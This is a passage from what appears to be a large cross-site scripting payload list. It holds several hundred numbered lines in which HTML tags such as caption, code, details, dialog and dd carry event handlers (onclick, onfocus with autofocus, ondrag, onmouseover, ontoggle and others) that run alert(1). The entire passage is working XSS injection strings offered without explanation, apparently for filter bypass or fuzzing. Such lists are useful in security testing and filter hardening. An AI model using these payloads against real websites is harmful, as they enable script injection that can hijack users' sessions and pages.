  2580. <caption draggable="true" ondrag="alert(1)">test</caption>
  2581. <caption draggable="true" ondragend="alert(1)">test</caption>
  2582. <caption draggable="true" ondragenter="alert(1)">test</caption>
  2583. <caption draggable="true" ondragleave="alert(1)">test</caption>
  2584. <caption draggable="true" ondragstart="alert(1)">test</caption>
  2585. <caption id=x tabindex=1 onactivate=alert(1)></caption>
  2586. <caption id=x tabindex=1 onbeforeactivate=alert(1)></caption>
  2587. <caption id=x tabindex=1 onbeforedeactivate=alert(1)></caption><input autofocus>
  2588. <caption id=x tabindex=1 ondeactivate=alert(1)></caption><input id=y autofocus>
  2589. <caption id=x tabindex=1 onfocus=alert(1)></caption>
  2590. <caption id=x tabindex=1 onfocusin=alert(1)></caption>
  2591. <caption onbeforecopy="alert(1)" contenteditable>test</caption>
  2592. <caption onbeforecut="alert(1)" contenteditable>test</caption>
  2593. <caption onbeforepaste="alert(1)" contenteditable>test</caption>
  2594. <caption onblur=alert(1) tabindex=1 id=x></caption><input autofocus>
  2595. <caption onclick="alert(1)">test</caption>
  2596. <caption oncontextmenu="alert(1)">test</caption>
  2597. <caption oncopy="alert(1)" contenteditable>test</caption>
  2598. <caption oncut="alert(1)" contenteditable>test</caption>
  2599. <caption ondblclick="alert(1)">test</caption>
  2600. <caption onfocusout=alert(1) tabindex=1 id=x></caption><input autofocus>
  2601. <caption onkeydown="alert(1)" contenteditable>test</caption>
  2602. <caption onkeypress="alert(1)" contenteditable>test</caption>
  2603. <caption onkeyup="alert(1)" contenteditable>test</caption>
  2604. <caption onmousedown="alert(1)">test</caption>
  2605. <caption onmouseenter="alert(1)">test</caption>
  2606. <caption onmouseleave="alert(1)">test</caption>
  2607. <caption onmousemove="alert(1)">test</caption>
  2608. <caption onmouseout="alert(1)">test</caption>
  2609. <caption onmouseover="alert(1)">test</caption>
  2610. <caption onmouseup="alert(1)">test</caption>
  2611. <caption onpaste="alert(1)" contenteditable>test</caption>
  2612. <center draggable="true" ondrag="alert(1)">test</center>
  2613. <center draggable="true" ondragend="alert(1)">test</center>
  2614. <center draggable="true" ondragenter="alert(1)">test</center>
  2615. <center draggable="true" ondragleave="alert(1)">test</center>
  2616. <center draggable="true" ondragstart="alert(1)">test</center>
  2617. <center id=x tabindex=1 onactivate=alert(1)></center>
  2618. <center id=x tabindex=1 onbeforeactivate=alert(1)></center>
  2619. <center id=x tabindex=1 onbeforedeactivate=alert(1)></center><input autofocus>
  2620. <center id=x tabindex=1 ondeactivate=alert(1)></center><input id=y autofocus>
  2621. <center id=x tabindex=1 onfocus=alert(1)></center>
  2622. <center id=x tabindex=1 onfocusin=alert(1)></center>
  2623. <center onbeforecopy="alert(1)" contenteditable>test</center>
  2624. <center onbeforecut="alert(1)" contenteditable>test</center>
  2625. <center onbeforepaste="alert(1)" contenteditable>test</center>
  2626. <center onblur=alert(1) tabindex=1 id=x></center><input autofocus>
  2627. <center onclick="alert(1)">test</center>
  2628. <center oncontextmenu="alert(1)">test</center>
  2629. <center oncopy="alert(1)" contenteditable>test</center>
  2630. <center oncut="alert(1)" contenteditable>test</center>
  2631. <center ondblclick="alert(1)">test</center>
  2632. <center onfocusout=alert(1) tabindex=1 id=x></center><input autofocus>
  2633. <center onkeydown="alert(1)" contenteditable>test</center>
  2634. <center onkeypress="alert(1)" contenteditable>test</center>
  2635. <center onkeyup="alert(1)" contenteditable>test</center>
  2636. <center onmousedown="alert(1)">test</center>
  2637. <center onmouseenter="alert(1)">test</center>
  2638. <center onmouseleave="alert(1)">test</center>
  2639. <center onmousemove="alert(1)">test</center>
  2640. <center onmouseout="alert(1)">test</center>
  2641. <center onmouseover="alert(1)">test</center>
  2642. <center onmouseup="alert(1)">test</center>
  2643. <center onpaste="alert(1)" contenteditable>test</center>
  2644. <cite draggable="true" ondrag="alert(1)">test</cite>
  2645. <cite draggable="true" ondragend="alert(1)">test</cite>
  2646. <cite draggable="true" ondragenter="alert(1)">test</cite>
  2647. <cite draggable="true" ondragleave="alert(1)">test</cite>
  2648. <cite draggable="true" ondragstart="alert(1)">test</cite>
  2649. <cite id=x tabindex=1 onactivate=alert(1)></cite>
  2650. <cite id=x tabindex=1 onbeforeactivate=alert(1)></cite>
  2651. <cite id=x tabindex=1 onbeforedeactivate=alert(1)></cite><input autofocus>
  2652. <cite id=x tabindex=1 ondeactivate=alert(1)></cite><input id=y autofocus>
  2653. <cite id=x tabindex=1 onfocus=alert(1)></cite>
  2654. <cite id=x tabindex=1 onfocusin=alert(1)></cite>
  2655. <cite onbeforecopy="alert(1)" contenteditable>test</cite>
  2656. <cite onbeforecut="alert(1)" contenteditable>test</cite>
  2657. <cite onbeforepaste="alert(1)" contenteditable>test</cite>
  2658. <cite onblur=alert(1) tabindex=1 id=x></cite><input autofocus>
  2659. <cite onclick="alert(1)">test</cite>
  2660. <cite oncontextmenu="alert(1)">test</cite>
  2661. <cite oncopy="alert(1)" contenteditable>test</cite>
  2662. <cite oncut="alert(1)" contenteditable>test</cite>
  2663. <cite ondblclick="alert(1)">test</cite>
  2664. <cite onfocusout=alert(1) tabindex=1 id=x></cite><input autofocus>
  2665. <cite onkeydown="alert(1)" contenteditable>test</cite>
  2666. <cite onkeypress="alert(1)" contenteditable>test</cite>
  2667. <cite onkeyup="alert(1)" contenteditable>test</cite>
  2668. <cite onmousedown="alert(1)">test</cite>
  2669. <cite onmouseenter="alert(1)">test</cite>
  2670. <cite onmouseleave="alert(1)">test</cite>
  2671. <cite onmousemove="alert(1)">test</cite>
  2672. <cite onmouseout="alert(1)">test</cite>
  2673. <cite onmouseover="alert(1)">test</cite>
  2674. <cite onmouseup="alert(1)">test</cite>
  2675. <cite onpaste="alert(1)" contenteditable>test</cite>
  2676. <code draggable="true" ondrag="alert(1)">test</code>
  2677. <code draggable="true" ondragend="alert(1)">test</code>
  2678. <code draggable="true" ondragenter="alert(1)">test</code>
  2679. <code draggable="true" ondragleave="alert(1)">test</code>
  2680. <code draggable="true" ondragstart="alert(1)">test</code>
  2681. <code id=x tabindex=1 onactivate=alert(1)></code>
  2682. <code id=x tabindex=1 onbeforeactivate=alert(1)></code>
  2683. <code id=x tabindex=1 onbeforedeactivate=alert(1)></code><input autofocus>
  2684. <code id=x tabindex=1 ondeactivate=alert(1)></code><input id=y autofocus>
  2685. <code id=x tabindex=1 onfocus=alert(1)></code>
  2686. <code id=x tabindex=1 onfocusin=alert(1)></code>
  2687. <code onbeforecopy="alert(1)" contenteditable>test</code>
  2688. <code onbeforecut="alert(1)" contenteditable>test</code>
  2689. <code onbeforepaste="alert(1)" contenteditable>test</code>
  2690. <code onblur=alert(1) tabindex=1 id=x></code><input autofocus>
  2691. <code onclick="alert(1)">test</code>
  2692. <code oncontextmenu="alert(1)">test</code>
  2693. <code oncopy="alert(1)" contenteditable>test</code>
  2694. <code oncut="alert(1)" contenteditable>test</code>
  2695. <code ondblclick="alert(1)">test</code>
  2696. <code onfocusout=alert(1) tabindex=1 id=x></code><input autofocus>
  2697. <code onkeydown="alert(1)" contenteditable>test</code>
  2698. <code onkeypress="alert(1)" contenteditable>test</code>
  2699. <code onkeyup="alert(1)" contenteditable>test</code>
  2700. <code onmousedown="alert(1)">test</code>
  2701. <code onmouseenter="alert(1)">test</code>
  2702. <code onmouseleave="alert(1)">test</code>
  2703. <code onmousemove="alert(1)">test</code>
  2704. <code onmouseout="alert(1)">test</code>
  2705. <code onmouseover="alert(1)">test</code>
  2706. <code onmouseup="alert(1)">test</code>
  2707. <code onpaste="alert(1)" contenteditable>test</code>
  2708. <col draggable="true" ondrag="alert(1)">test</col>
  2709. <col draggable="true" ondragend="alert(1)">test</col>
  2710. <col draggable="true" ondragenter="alert(1)">test</col>
  2711. <col draggable="true" ondragleave="alert(1)">test</col>
  2712. <col draggable="true" ondragstart="alert(1)">test</col>
  2713. <col id=x tabindex=1 onactivate=alert(1)></col>
  2714. <col id=x tabindex=1 onbeforeactivate=alert(1)></col>
  2715. <col id=x tabindex=1 onbeforedeactivate=alert(1)></col><input autofocus>
  2716. <col id=x tabindex=1 ondeactivate=alert(1)></col><input id=y autofocus>
  2717. <col id=x tabindex=1 onfocus=alert(1)></col>
  2718. <col id=x tabindex=1 onfocusin=alert(1)></col>
  2719. <col onbeforecopy="alert(1)" contenteditable>test</col>
  2720. <col onbeforecut="alert(1)" contenteditable>test</col>
  2721. <col onbeforepaste="alert(1)" contenteditable>test</col>
  2722. <col onblur=alert(1) tabindex=1 id=x></col><input autofocus>
  2723. <col onclick="alert(1)">test</col>
  2724. <col oncontextmenu="alert(1)">test</col>
  2725. <col oncopy="alert(1)" contenteditable>test</col>
  2726. <col oncut="alert(1)" contenteditable>test</col>
  2727. <col ondblclick="alert(1)">test</col>
  2728. <col onfocusout=alert(1) tabindex=1 id=x></col><input autofocus>
  2729. <col onkeydown="alert(1)" contenteditable>test</col>
  2730. <col onkeypress="alert(1)" contenteditable>test</col>
  2731. <col onkeyup="alert(1)" contenteditable>test</col>
  2732. <col onmousedown="alert(1)">test</col>
  2733. <col onmouseenter="alert(1)">test</col>
  2734. <col onmouseleave="alert(1)">test</col>
  2735. <col onmousemove="alert(1)">test</col>
  2736. <col onmouseout="alert(1)">test</col>
  2737. <col onmouseover="alert(1)">test</col>
  2738. <col onmouseup="alert(1)">test</col>
  2739. <col onpaste="alert(1)" contenteditable>test</col>
  2740. <colgroup draggable="true" ondrag="alert(1)">test</colgroup>
  2741. <colgroup draggable="true" ondragend="alert(1)">test</colgroup>
  2742. <colgroup draggable="true" ondragenter="alert(1)">test</colgroup>
  2743. <colgroup draggable="true" ondragleave="alert(1)">test</colgroup>
  2744. <colgroup draggable="true" ondragstart="alert(1)">test</colgroup>
  2745. <colgroup id=x tabindex=1 onactivate=alert(1)></colgroup>
  2746. <colgroup id=x tabindex=1 onbeforeactivate=alert(1)></colgroup>
  2747. <colgroup id=x tabindex=1 onbeforedeactivate=alert(1)></colgroup><input autofocus>
  2748. <colgroup id=x tabindex=1 ondeactivate=alert(1)></colgroup><input id=y autofocus>
  2749. <colgroup id=x tabindex=1 onfocus=alert(1)></colgroup>
  2750. <colgroup id=x tabindex=1 onfocusin=alert(1)></colgroup>
  2751. <colgroup onbeforecopy="alert(1)" contenteditable>test</colgroup>
  2752. <colgroup onbeforecut="alert(1)" contenteditable>test</colgroup>
  2753. <colgroup onbeforepaste="alert(1)" contenteditable>test</colgroup>
  2754. <colgroup onblur=alert(1) tabindex=1 id=x></colgroup><input autofocus>
  2755. <colgroup onclick="alert(1)">test</colgroup>
  2756. <colgroup oncontextmenu="alert(1)">test</colgroup>
  2757. <colgroup oncopy="alert(1)" contenteditable>test</colgroup>
  2758. <colgroup oncut="alert(1)" contenteditable>test</colgroup>
  2759. <colgroup ondblclick="alert(1)">test</colgroup>
  2760. <colgroup onfocusout=alert(1) tabindex=1 id=x></colgroup><input autofocus>
  2761. <colgroup onkeydown="alert(1)" contenteditable>test</colgroup>
  2762. <colgroup onkeypress="alert(1)" contenteditable>test</colgroup>
  2763. <colgroup onkeyup="alert(1)" contenteditable>test</colgroup>
  2764. <colgroup onmousedown="alert(1)">test</colgroup>
  2765. <colgroup onmouseenter="alert(1)">test</colgroup>
  2766. <colgroup onmouseleave="alert(1)">test</colgroup>
  2767. <colgroup onmousemove="alert(1)">test</colgroup>
  2768. <colgroup onmouseout="alert(1)">test</colgroup>
  2769. <colgroup onmouseover="alert(1)">test</colgroup>
  2770. <colgroup onmouseup="alert(1)">test</colgroup>
  2771. <colgroup onpaste="alert(1)" contenteditable>test</colgroup>
  2772. <command draggable="true" ondrag="alert(1)">test</command>
  2773. <command draggable="true" ondragend="alert(1)">test</command>
  2774. <command draggable="true" ondragenter="alert(1)">test</command>
  2775. <command draggable="true" ondragleave="alert(1)">test</command>
  2776. <command draggable="true" ondragstart="alert(1)">test</command>
  2777. <command id=x tabindex=1 onactivate=alert(1)></command>
  2778. <command id=x tabindex=1 onbeforeactivate=alert(1)></command>
  2779. <command id=x tabindex=1 onbeforedeactivate=alert(1)></command><input autofocus>
  2780. <command id=x tabindex=1 ondeactivate=alert(1)></command><input id=y autofocus>
  2781. <command id=x tabindex=1 onfocus=alert(1)></command>
  2782. <command id=x tabindex=1 onfocusin=alert(1)></command>
  2783. <command onbeforecopy="alert(1)" contenteditable>test</command>
  2784. <command onbeforecut="alert(1)" contenteditable>test</command>
  2785. <command onbeforepaste="alert(1)" contenteditable>test</command>
  2786. <command onblur=alert(1) tabindex=1 id=x></command><input autofocus>
  2787. <command onclick="alert(1)">test</command>
  2788. <command oncontextmenu="alert(1)">test</command>
  2789. <command oncopy="alert(1)" contenteditable>test</command>
  2790. <command oncut="alert(1)" contenteditable>test</command>
  2791. <command ondblclick="alert(1)">test</command>
  2792. <command onfocusout=alert(1) tabindex=1 id=x></command><input autofocus>
  2793. <command onkeydown="alert(1)" contenteditable>test</command>
  2794. <command onkeypress="alert(1)" contenteditable>test</command>
  2795. <command onkeyup="alert(1)" contenteditable>test</command>
  2796. <command onmousedown="alert(1)">test</command>
  2797. <command onmouseenter="alert(1)">test</command>
  2798. <command onmouseleave="alert(1)">test</command>
  2799. <command onmousemove="alert(1)">test</command>
  2800. <command onmouseout="alert(1)">test</command>
  2801. <command onmouseover="alert(1)">test</command>
  2802. <command onmouseup="alert(1)">test</command>
  2803. <command onpaste="alert(1)" contenteditable>test</command>
  2804. <content draggable="true" ondrag="alert(1)">test</content>
  2805. <content draggable="true" ondragend="alert(1)">test</content>
  2806. <content draggable="true" ondragenter="alert(1)">test</content>
  2807. <content draggable="true" ondragleave="alert(1)">test</content>
  2808. <content draggable="true" ondragstart="alert(1)">test</content>
  2809. <content id=x tabindex=1 onactivate=alert(1)></content>
  2810. <content id=x tabindex=1 onbeforeactivate=alert(1)></content>
  2811. <content id=x tabindex=1 onbeforedeactivate=alert(1)></content><input autofocus>
  2812. <content id=x tabindex=1 ondeactivate=alert(1)></content><input id=y autofocus>
  2813. <content id=x tabindex=1 onfocus=alert(1)></content>
  2814. <content id=x tabindex=1 onfocusin=alert(1)></content>
  2815. <content onbeforecopy="alert(1)" contenteditable>test</content>
  2816. <content onbeforecut="alert(1)" contenteditable>test</content>
  2817. <content onbeforepaste="alert(1)" contenteditable>test</content>
  2818. <content onblur=alert(1) tabindex=1 id=x></content><input autofocus>
  2819. <content onclick="alert(1)">test</content>
  2820. <content oncontextmenu="alert(1)">test</content>
  2821. <content oncopy="alert(1)" contenteditable>test</content>
  2822. <content oncut="alert(1)" contenteditable>test</content>
  2823. <content ondblclick="alert(1)">test</content>
  2824. <content onfocusout=alert(1) tabindex=1 id=x></content><input autofocus>
  2825. <content onkeydown="alert(1)" contenteditable>test</content>
  2826. <content onkeypress="alert(1)" contenteditable>test</content>
  2827. <content onkeyup="alert(1)" contenteditable>test</content>
  2828. <content onmousedown="alert(1)">test</content>
  2829. <content onmouseenter="alert(1)">test</content>
  2830. <content onmouseleave="alert(1)">test</content>
  2831. <content onmousemove="alert(1)">test</content>
  2832. <content onmouseout="alert(1)">test</content>
  2833. <content onmouseover="alert(1)">test</content>
  2834. <content onmouseup="alert(1)">test</content>
  2835. <content onpaste="alert(1)" contenteditable>test</content>
  2836. <data draggable="true" ondrag="alert(1)">test</data>
  2837. <data draggable="true" ondragend="alert(1)">test</data>
  2838. <data draggable="true" ondragenter="alert(1)">test</data>
  2839. <data draggable="true" ondragleave="alert(1)">test</data>
  2840. <data draggable="true" ondragstart="alert(1)">test</data>
  2841. <data id=x tabindex=1 onactivate=alert(1)></data>
  2842. <data id=x tabindex=1 onbeforeactivate=alert(1)></data>
  2843. <data id=x tabindex=1 onbeforedeactivate=alert(1)></data><input autofocus>
  2844. <data id=x tabindex=1 ondeactivate=alert(1)></data><input id=y autofocus>
  2845. <data id=x tabindex=1 onfocus=alert(1)></data>
  2846. <data id=x tabindex=1 onfocusin=alert(1)></data>
  2847. <data onbeforecopy="alert(1)" contenteditable>test</data>
  2848. <data onbeforecut="alert(1)" contenteditable>test</data>
  2849. <data onbeforepaste="alert(1)" contenteditable>test</data>
  2850. <data onblur=alert(1) tabindex=1 id=x></data><input autofocus>
  2851. <data onclick="alert(1)">test</data>
  2852. <data oncontextmenu="alert(1)">test</data>
  2853. <data oncopy="alert(1)" contenteditable>test</data>
  2854. <data oncut="alert(1)" contenteditable>test</data>
  2855. <data ondblclick="alert(1)">test</data>
  2856. <data onfocusout=alert(1) tabindex=1 id=x></data><input autofocus>
  2857. <data onkeydown="alert(1)" contenteditable>test</data>
  2858. <data onkeypress="alert(1)" contenteditable>test</data>
  2859. <data onkeyup="alert(1)" contenteditable>test</data>
  2860. <data onmousedown="alert(1)">test</data>
  2861. <data onmouseenter="alert(1)">test</data>
  2862. <data onmouseleave="alert(1)">test</data>
  2863. <data onmousemove="alert(1)">test</data>
  2864. <data onmouseout="alert(1)">test</data>
  2865. <data onmouseover="alert(1)">test</data>
  2866. <data onmouseup="alert(1)">test</data>
  2867. <data onpaste="alert(1)" contenteditable>test</data>
  2868. <datalist draggable="true" ondrag="alert(1)">test</datalist>
  2869. <datalist draggable="true" ondragend="alert(1)">test</datalist>
  2870. <datalist draggable="true" ondragenter="alert(1)">test</datalist>
  2871. <datalist draggable="true" ondragleave="alert(1)">test</datalist>
  2872. <datalist draggable="true" ondragstart="alert(1)">test</datalist>
  2873. <datalist id=x tabindex=1 onactivate=alert(1)></datalist>
  2874. <datalist id=x tabindex=1 onbeforeactivate=alert(1)></datalist>
  2875. <datalist id=x tabindex=1 onbeforedeactivate=alert(1)></datalist><input autofocus>
  2876. <datalist id=x tabindex=1 ondeactivate=alert(1)></datalist><input id=y autofocus>
  2877. <datalist id=x tabindex=1 onfocus=alert(1)></datalist>
  2878. <datalist id=x tabindex=1 onfocusin=alert(1)></datalist>
  2879. <datalist onbeforecopy="alert(1)" contenteditable>test</datalist>
  2880. <datalist onbeforecut="alert(1)" contenteditable>test</datalist>
  2881. <datalist onbeforepaste="alert(1)" contenteditable>test</datalist>
  2882. <datalist onblur=alert(1) tabindex=1 id=x></datalist><input autofocus>
  2883. <datalist onclick="alert(1)">test</datalist>
  2884. <datalist oncontextmenu="alert(1)">test</datalist>
  2885. <datalist oncopy="alert(1)" contenteditable>test</datalist>
  2886. <datalist oncut="alert(1)" contenteditable>test</datalist>
  2887. <datalist ondblclick="alert(1)">test</datalist>
  2888. <datalist onfocusout=alert(1) tabindex=1 id=x></datalist><input autofocus>
  2889. <datalist onkeydown="alert(1)" contenteditable>test</datalist>
  2890. <datalist onkeypress="alert(1)" contenteditable>test</datalist>
  2891. <datalist onkeyup="alert(1)" contenteditable>test</datalist>
  2892. <datalist onmousedown="alert(1)">test</datalist>
  2893. <datalist onmouseenter="alert(1)">test</datalist>
  2894. <datalist onmouseleave="alert(1)">test</datalist>
  2895. <datalist onmousemove="alert(1)">test</datalist>
  2896. <datalist onmouseout="alert(1)">test</datalist>
  2897. <datalist onmouseover="alert(1)">test</datalist>
  2898. <datalist onmouseup="alert(1)">test</datalist>
  2899. <datalist onpaste="alert(1)" contenteditable>test</datalist>
  2900. <dd draggable="true" ondrag="alert(1)">test</dd>
  2901. <dd draggable="true" ondragend="alert(1)">test</dd>
  2902. <dd draggable="true" ondragenter="alert(1)">test</dd>
  2903. <dd draggable="true" ondragleave="alert(1)">test</dd>
  2904. <dd draggable="true" ondragstart="alert(1)">test</dd>
  2905. <dd id=x tabindex=1 onactivate=alert(1)></dd>
  2906. <dd id=x tabindex=1 onbeforeactivate=alert(1)></dd>
  2907. <dd id=x tabindex=1 onbeforedeactivate=alert(1)></dd><input autofocus>
  2908. <dd id=x tabindex=1 ondeactivate=alert(1)></dd><input id=y autofocus>
  2909. <dd id=x tabindex=1 onfocus=alert(1)></dd>
  2910. <dd id=x tabindex=1 onfocusin=alert(1)></dd>
  2911. <dd onbeforecopy="alert(1)" contenteditable>test</dd>
  2912. <dd onbeforecut="alert(1)" contenteditable>test</dd>
  2913. <dd onbeforepaste="alert(1)" contenteditable>test</dd>
  2914. <dd onblur=alert(1) tabindex=1 id=x></dd><input autofocus>
  2915. <dd onclick="alert(1)">test</dd>
  2916. <dd oncontextmenu="alert(1)">test</dd>
  2917. <dd oncopy="alert(1)" contenteditable>test</dd>
  2918. <dd oncut="alert(1)" contenteditable>test</dd>
  2919. <dd ondblclick="alert(1)">test</dd>
  2920. <dd onfocusout=alert(1) tabindex=1 id=x></dd><input autofocus>
  2921. <dd onkeydown="alert(1)" contenteditable>test</dd>
  2922. <dd onkeypress="alert(1)" contenteditable>test</dd>
  2923. <dd onkeyup="alert(1)" contenteditable>test</dd>
  2924. <dd onmousedown="alert(1)">test</dd>
  2925. <dd onmouseenter="alert(1)">test</dd>
  2926. <dd onmouseleave="alert(1)">test</dd>
  2927. <dd onmousemove="alert(1)">test</dd>
  2928. <dd onmouseout="alert(1)">test</dd>
  2929. <dd onmouseover="alert(1)">test</dd>
  2930. <dd onmouseup="alert(1)">test</dd>
  2931. <dd onpaste="alert(1)" contenteditable>test</dd>
  2932. <del draggable="true" ondrag="alert(1)">test</del>
  2933. <del draggable="true" ondragend="alert(1)">test</del>
  2934. <del draggable="true" ondragenter="alert(1)">test</del>
  2935. <del draggable="true" ondragleave="alert(1)">test</del>
  2936. <del draggable="true" ondragstart="alert(1)">test</del>
  2937. <del id=x tabindex=1 onactivate=alert(1)></del>
  2938. <del id=x tabindex=1 onbeforeactivate=alert(1)></del>
  2939. <del id=x tabindex=1 onbeforedeactivate=alert(1)></del><input autofocus>
  2940. <del id=x tabindex=1 ondeactivate=alert(1)></del><input id=y autofocus>
  2941. <del id=x tabindex=1 onfocus=alert(1)></del>
  2942. <del id=x tabindex=1 onfocusin=alert(1)></del>
  2943. <del onbeforecopy="alert(1)" contenteditable>test</del>
  2944. <del onbeforecut="alert(1)" contenteditable>test</del>
  2945. <del onbeforepaste="alert(1)" contenteditable>test</del>
  2946. <del onblur=alert(1) tabindex=1 id=x></del><input autofocus>
  2947. <del onclick="alert(1)">test</del>
  2948. <del oncontextmenu="alert(1)">test</del>
  2949. <del oncopy="alert(1)" contenteditable>test</del>
  2950. <del oncut="alert(1)" contenteditable>test</del>
  2951. <del ondblclick="alert(1)">test</del>
  2952. <del onfocusout=alert(1) tabindex=1 id=x></del><input autofocus>
  2953. <del onkeydown="alert(1)" contenteditable>test</del>
  2954. <del onkeypress="alert(1)" contenteditable>test</del>
  2955. <del onkeyup="alert(1)" contenteditable>test</del>
  2956. <del onmousedown="alert(1)">test</del>
  2957. <del onmouseenter="alert(1)">test</del>
  2958. <del onmouseleave="alert(1)">test</del>
  2959. <del onmousemove="alert(1)">test</del>
  2960. <del onmouseout="alert(1)">test</del>
  2961. <del onmouseover="alert(1)">test</del>
  2962. <del onmouseup="alert(1)">test</del>
  2963. <del onpaste="alert(1)" contenteditable>test</del>
  2964. <details draggable="true" ondrag="alert(1)">test</details>
  2965. <details draggable="true" ondragend="alert(1)">test</details>
  2966. <details draggable="true" ondragenter="alert(1)">test</details>
  2967. <details draggable="true" ondragleave="alert(1)">test</details>
  2968. <details draggable="true" ondragstart="alert(1)">test</details>
  2969. <details id=x tabindex=1 onactivate=alert(1)></details>
  2970. <details id=x tabindex=1 onbeforeactivate=alert(1)></details>
  2971. <details id=x tabindex=1 onbeforedeactivate=alert(1)></details><input autofocus>
  2972. <details id=x tabindex=1 ondeactivate=alert(1)></details><input id=y autofocus>
  2973. <details id=x tabindex=1 onfocus=alert(1)></details>
  2974. <details id=x tabindex=1 onfocusin=alert(1)></details>
  2975. <details onbeforecopy="alert(1)" contenteditable>test</details>
  2976. <details onbeforecut="alert(1)" contenteditable>test</details>
  2977. <details onbeforepaste="alert(1)" contenteditable>test</details>
  2978. <details onblur=alert(1) tabindex=1 id=x></details><input autofocus>
  2979. <details onclick="alert(1)">test</details>
  2980. <details oncontextmenu="alert(1)">test</details>
  2981. <details oncopy="alert(1)" contenteditable>test</details>
  2982. <details oncut="alert(1)" contenteditable>test</details>
  2983. <details ondblclick="alert(1)">test</details>
  2984. <details onfocusout=alert(1) tabindex=1 id=x></details><input autofocus>
  2985. <details onkeydown="alert(1)" contenteditable>test</details>
  2986. <details onkeypress="alert(1)" contenteditable>test</details>
  2987. <details onkeyup="alert(1)" contenteditable>test</details>
  2988. <details onmousedown="alert(1)">test</details>
  2989. <details onmouseenter="alert(1)">test</details>
  2990. <details onmouseleave="alert(1)">test</details>
  2991. <details onmousemove="alert(1)">test</details>
  2992. <details onmouseout="alert(1)">test</details>
  2993. <details onmouseover="alert(1)">test</details>
  2994. <details onmouseup="alert(1)">test</details>
  2995. <details onpaste="alert(1)" contenteditable>test</details>
  2996. <details ontoggle=alert(1) open>test</details>
  2997. <dfn draggable="true" ondrag="alert(1)">test</dfn>
  2998. <dfn draggable="true" ondragend="alert(1)">test</dfn>
  2999. <dfn draggable="true" ondragenter="alert(1)">test</dfn>
  3000. <dfn draggable="true" ondragleave="alert(1)">test</dfn>
  3001. <dfn draggable="true" ondragstart="alert(1)">test</dfn>
  3002. <dfn id=x tabindex=1 onactivate=alert(1)></dfn>
  3003. <dfn id=x tabindex=1 onbeforeactivate=alert(1)></dfn>
  3004. <dfn id=x tabindex=1 onbeforedeactivate=alert(1)></dfn><input autofocus>
  3005. <dfn id=x tabindex=1 ondeactivate=alert(1)></dfn><input id=y autofocus>
  3006. <dfn id=x tabindex=1 onfocus=alert(1)></dfn>
  3007. <dfn id=x tabindex=1 onfocusin=alert(1)></dfn>
  3008. <dfn onbeforecopy="alert(1)" contenteditable>test</dfn>
  3009. <dfn onbeforecut="alert(1)" contenteditable>test</dfn>
  3010. <dfn onbeforepaste="alert(1)" contenteditable>test</dfn>
  3011. <dfn onblur=alert(1) tabindex=1 id=x></dfn><input autofocus>
  3012. <dfn onclick="alert(1)">test</dfn>
  3013. <dfn oncontextmenu="alert(1)">test</dfn>
  3014. <dfn oncopy="alert(1)" contenteditable>test</dfn>
  3015. <dfn oncut="alert(1)" contenteditable>test</dfn>
  3016. <dfn ondblclick="alert(1)">test</dfn>
  3017. <dfn onfocusout=alert(1) tabindex=1 id=x></dfn><input autofocus>
  3018. <dfn onkeydown="alert(1)" contenteditable>test</dfn>
  3019. <dfn onkeypress="alert(1)" contenteditable>test</dfn>
  3020. <dfn onkeyup="alert(1)" contenteditable>test</dfn>
  3021. <dfn onmousedown="alert(1)">test</dfn>
  3022. <dfn onmouseenter="alert(1)">test</dfn>
  3023. <dfn onmouseleave="alert(1)">test</dfn>
  3024. <dfn onmousemove="alert(1)">test</dfn>
  3025. <dfn onmouseout="alert(1)">test</dfn>
  3026. <dfn onmouseover="alert(1)">test</dfn>
  3027. <dfn onmouseup="alert(1)">test</dfn>
  3028. <dfn onpaste="alert(1)" contenteditable>test</dfn>
  3029. <dialog draggable="true" ondrag="alert(1)">test</dialog>
  3030. <dialog draggable="true" ondragend="alert(1)">test</dialog>
  3031. <dialog draggable="true" ondragenter="alert(1)">test</dialog>
  3032. <dialog draggable="true" ondragleave="alert(1)">test</dialog>
  3033. <dialog draggable="true" ondragstart="alert(1)">test</dialog>
  3034. <dialog id=x tabindex=1 onactivate=alert(1)></dialog>
  3035. <dialog id=x tabindex=1 onbeforeactivate=alert(1)></dialog>
  3036. <dialog id=x tabindex=1 onbeforedeactivate=alert(1)></dialog><input autofocus>
  3037. <dialog id=x tabindex=1 ondeactivate=alert(1)></dialog><input id=y autofocus>
  3038. <dialog id=x tabindex=1 onfocus=alert(1)></dialog>
  3039. <dialog id=x tabindex=1 onfocusin=alert(1)></dialog>
  3040. <dialog onbeforecopy="alert(1)" contenteditable>test</dialog>
  3041. <dialog onbeforecut="alert(1)" contenteditable>test</dialog>
  3042. <dialog onbeforepaste="alert(1)" contenteditable>test</dialog>
  3043. <dialog onblur=alert(1) tabindex=1 id=x></dialog><input autofocus>
  3044. <dialog onclick="alert(1)">test</dialog>
  3045. <dialog oncontextmenu="alert(1)">test</dialog>
  3046. <dialog oncopy="alert(1)" contenteditable>test</dialog>
  3047. <dialog oncut="alert(1)" contenteditable>test</dialog>
  3048. <dialog ondblclick="alert(1)">test</dialog>
  3049. <dialog onfocusout=alert(1) tabindex=1 id=x></dialog><input autofocus>
  3050. <dialog onkeydown="alert(1)" contenteditable>test</dialog>
  3051. <dialog onkeypress="alert(1)" contenteditable>test</dialog>
  3052. <dialog onkeyup="alert(1)" contenteditable>test</dialog>
  3053. <dialog onmousedown="alert(1)">test</dialog>
  3054. <dialog onmouseenter="alert(1)">test</dialog>
  3055. <dialog onmouseleave="alert(1)">test</dialog>
  3056. <dialog onmousemove="alert(1)">test</dialog>
  3057. <dialog onmouseout="alert(1)">test</dialog>
  3058. <dialog onmouseover="alert(1)">test</dialog>
  3059. <dialog onmouseup="alert(1)">test</dialog>
  3060. <dialog onpaste="alert(1)" contenteditable>test</dialog>
  3061. <dir draggable="true" ondrag="alert(1)">test</dir>
  3062. <dir draggable="true" ondragend="alert(1)">test</dir>
  3063. <dir draggable="true" ondragenter="alert(1)">test</dir>
  3064. <dir draggable="true" ondragleave="alert(1)">test</dir>
  3065. <dir draggable="true" ondragstart="alert(1)">test</dir>
  3066. <dir id=x tabindex=1 onactivate=alert(1)></dir>
  3067. <dir id=x tabindex=1 onbeforeactivate=alert(1)></dir>
  3068. <dir id=x tabindex=1 onbeforedeactivate=alert(1)></dir><input autofocus>
  3069. <dir id=x tabindex=1 ondeactivate=alert(1)></dir><input id=y autofocus>
  3070. <dir id=x tabindex=1 onfocus=alert(1)></dir>
  3071. <dir id=x tabindex=1 onfocusin=alert(1)></dir>
  3072. <dir onbeforecopy="alert(1)" contenteditable>test</dir>
  3073. <dir onbeforecut="alert(1)" contenteditable>test</dir>
